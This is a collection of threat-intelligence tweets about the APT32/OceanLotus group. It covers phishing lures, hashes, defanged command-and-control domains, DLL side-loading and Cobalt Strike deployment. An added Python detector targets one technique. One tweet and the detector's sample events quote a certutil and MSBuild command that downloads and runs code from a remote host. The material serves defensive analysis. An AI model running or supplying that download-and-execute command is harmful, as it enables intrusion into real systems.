-
#APT32 has to brief metrics like any other government program. Using sales tracking software, their numbers can show what % breached each target is.
NOTE: APT32 uses trial accounts for several sales trackers that also allow for legit cloud hosting of their payloads!

-
Moral of the story is - opening an email in certain mail clients can leak information about your system b/c your mail client autoloads a tracking pixel. And although it might be a company hosting a hot @RSAConference party - it could also be someone less "friendly" #DFIR #APT32 pic.twitter.com/sjFhhQOJTK
-
Further reading on Vietnamese threat actor #APT32 leveraging EPO's software deployment pulls to ship Cobalt Strike #BEACON enterprise-wide: https://twitter.com/ItsReallyNick/status/915903579042566144?s=20 …
I still think asset management abuse needs a fun name. How about "living off the landlord?" -
Interesting tidbit from report. “The attacker utilized the anti-virus management console service account to distribute the malware across the network.” Sounds similar to #APT32 deploying Cobalt Strike via McAfee EPO server @ItsReallyNick & I discussed recently on #StateOfTheHack https://twitter.com/campuscodi/status/1215128139271147520 …
-
#OceanLotus (#APT32) campaign spreading via FB. Post or DM contains link to a malicious archive hosted on Dropbox. First stage is executed upon opening the decoy “document” seemingly related to Vietnam. Beacons to opengroup.homeunix[.]org via HTTPS. @marc_etienne_ #ESETresearch pic.twitter.com/7CKXhe2b4m
-
For the U.S. crowd, just waking up: BMW was hacked by #APT32. The carmaker decided to monitor the intruders for months to better understand their goals. No sensitive data is said to be stolen. Also, Hyundai was targeted in the same campaign. https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html … (in german)
-
Exclusive: A hacker group believed to be acting on behalf of the Vietnamese state has German car manufacturers in its sights. They succeeded in penetrating BMW's networks. BMW observed the hackers for months. https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html …
#OceanLotus #APT32
-
Stopped using PowerShell for attacks? Seems to be working just fine for #APT32
lang.ps1 uploaded yesterday (3/56): https://www.virustotal.com/gui/file/f5e742f8eb37bdc44712c04331b55576d776fa5c1bf15fed9ec270e15c21b749/detection …
I appreciate their signature obfuscation style (pictured)
The underlying backdoor here is very creative... [1/2] pic.twitter.com/53SCaV6m0v
-
DLL side-loading seems utilized by the #APT32 #OceanLotus group to deliver malware generated by Cobalt Strike. URL: hxxps://cdn.redirectme.net/JbJf File name: Noi dung chi tiet thu moi tham du hoi nghi va lich trinh dien ra hoi nghi tai thu do Paris Phap https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&sha1=621ea1ccdff21b0c104280673e91a23ad5e492d3 … pic.twitter.com/JzRdglXHLd
-
#APT32 #OceanLotus New test sample seems crafted by the #OceanLotus APT group. Malicious payload is dropped to the startup folder through #WinRAR exploit (#CVE-2018-20250), meanwhile a resume gets displayed to confuse the victim. https://www.virustotal.com/gui/file/4ae7a9d63870c82138a38159b5364f84188a06dc5325f99ef36149cc5ff5e48a … pic.twitter.com/rH2YQUbTwo
-
#APT32 targets a Vietnamese human rights organization. SHA1: c159e6489ca0b516017b7468013084a8fc422870 File name: "Danh sach cac ca nhan to chuc tai Hai ngoai va quoc noi ung ho cac tu nhan luong tam bi buc hai.exe"
-
#APT32 #OceanLotus Decoy document containing the map of Spratly Islands seems used by the #OceanLotus APT group. Similar DLL Side-Loading approach is utilized to carry out related attacks. https://www.virustotal.com/gui/file/c0804ba6eae469c2753e0ef23bb0d0ba953702be8426aa209eac5d6b89d7f886/detection … pic.twitter.com/HtCdrJg8zJ
-
#APT #APT32 #OCEANLOTUS #SectorF01 may be #Korplug cluster ref. @nshcthreatrecon repo of 25/07 md5: 05b5707d79ca0aee269eb1b02db75b19
-
#APT32 The SFX archive drops and executes a lure (docx file) to decoy the victim and the dll file (pkg file) to load the Quasar RAT with the bin file, whose role is to reorganize the final PE. pic.twitter.com/CnYhky5Kmw
-
#APT32 c7eead9b2a622dd7f14f2ddb9bcd4ea3c4cf3a7dddc30283a057482c4ed6a93e WN: ប្រកាសតែងតាំងមុខតំណែង_docx.exe C2: get[.]freelicenses[.]net https://s.threatbook.cn/report/file/c7eead9b2a622dd7f14f2ddb9bcd4ea3c4cf3a7dddc30283a057482c4ed6a93e/?sign=history&env=win7_sp1_enx86_office2013 … pic.twitter.com/hTMGqeP2re
-
#APT32 phishing - now with more #TweeTPs
Windows.csproj & .mp4 downloaded with certutil
MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService"
Payload loaded in memory then deleted from disk https://twitter.com/RedDrip7/status/1130780807318999040 …
-
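Detection logic for the technique in the tweet above (certutil fetching a project file, then MSBuild.exe building it from a temp directory with a property that carries a URL), added here as an example that is not part of the original thread. The "Key=Value; Key=Value" event format, the file paths and the 192.0.2.10 address are all constructed for the illustration; nothing here is live telemetry or a real indicator.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (not real telemetry). The command lines
# mirror the tweet's pattern; the address is a documentation placeholder.
SAMPLE_EVENTS: List[str] = [
    "ParentImage=C:\\Windows\\System32\\cmd.exe; "
    "Image=C:\\Windows\\System32\\certutil.exe; "
    "CommandLine=certutil -urlcache -split -f http://192.0.2.10:8090/Windows.csproj "
    "C:\\Users\\u\\AppData\\Local\\Temp\\Windows.csproj",
    "ParentImage=C:\\Windows\\System32\\cmd.exe; "
    "Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe; "
    "CommandLine=MSBuild.exe C:\\Users\\u\\AppData\\Local\\Temp\\Windows.csproj "
    "/p:AssemblyName=C:\\Users\\u\\AppData\\Local\\Temp\\Windows.mp4 "
    "/p:ScriptFile=http://192.0.2.10:8090/abcv /p:Key=\"WindowsService\"",
    # Benign build launched from an IDE; must not be flagged.
    "ParentImage=C:\\Program Files\\Microsoft Visual Studio\\devenv.exe; "
    "Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe; "
    "CommandLine=MSBuild.exe C:\\src\\app\\app.csproj /t:Build /p:Configuration=Release",
]

# Directories a legitimate build rarely runs from; a project file there is suspect.
WRITABLE_DIR_RE = re.compile(r"\\(temp|tmp|downloads|public|programdata)\\", re.IGNORECASE)
# An MSBuild property whose value is a URL (the tweet's /p:ScriptFile=hxxp://...).
URL_PROPERTY_RE = re.compile(r"/p:\w+=\"?https?://", re.IGNORECASE)
# certutil's URL cache switch combined with a URL: the classic download cradle.
CERTUTIL_DL_RE = re.compile(r"-urlcache\b.*https?://", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=Value; Key=Value' into a dict; the first '=' of each part separates key from value."""
    fields: Dict[str, str] = {}
    for part in line.split("; "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event looks like MSBuild/certutil abuse (empty if none)."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image.endswith("\\msbuild.exe"):
        if WRITABLE_DIR_RE.search(cmd):
            reasons.append("msbuild: project file in user-writable directory")
        if URL_PROPERTY_RE.search(cmd):
            reasons.append("msbuild: property value is a URL")
    elif image.endswith("\\certutil.exe") and CERTUTIL_DL_RE.search(cmd):
        reasons.append("certutil: used to download from a URL")
    return reasons


def detect(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Run score_event over every raw event line; return (index, reasons) for each hit."""
    hits: List[Tuple[int, List[str]]] = []
    for idx, line in enumerate(lines):
        reasons = score_event(parse_event(line))
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Correlating the two hits by parent process (both spawned from the same cmd.exe) and by the shared project-file path would tighten the rule further; the two regexes alone are enough to separate the tweet's pattern from the IDE-launched build in the third event.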
#APT #OceanLotus #APT32 d53779393984053ec239ec16adc272d7 Embedding Base64 string in Content pic.twitter.com/ZAvMb4moVA
-
#APT32 something new about Apt32.... https://pastebin.com/sRzfwfsa @Manu_De_Lucia @JAMESWT_MHT @malwrhunterteam @JAMESWT_MHT @DrunkBinary @JRoosen @DissectMalware @malware_traffic @VK_Intel
-
#OceanLotus/#APT32 is back with a new watering hole campaign. Many compromised websites including 2 Cambodian ministries (Ministry of Foreign Affairs and Ministry of Defence). Blog: https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/ … @MISP event: https://github.com/eset/malware-ioc/tree/master/oceanlotus … pic.twitter.com/CHk0AvpwbE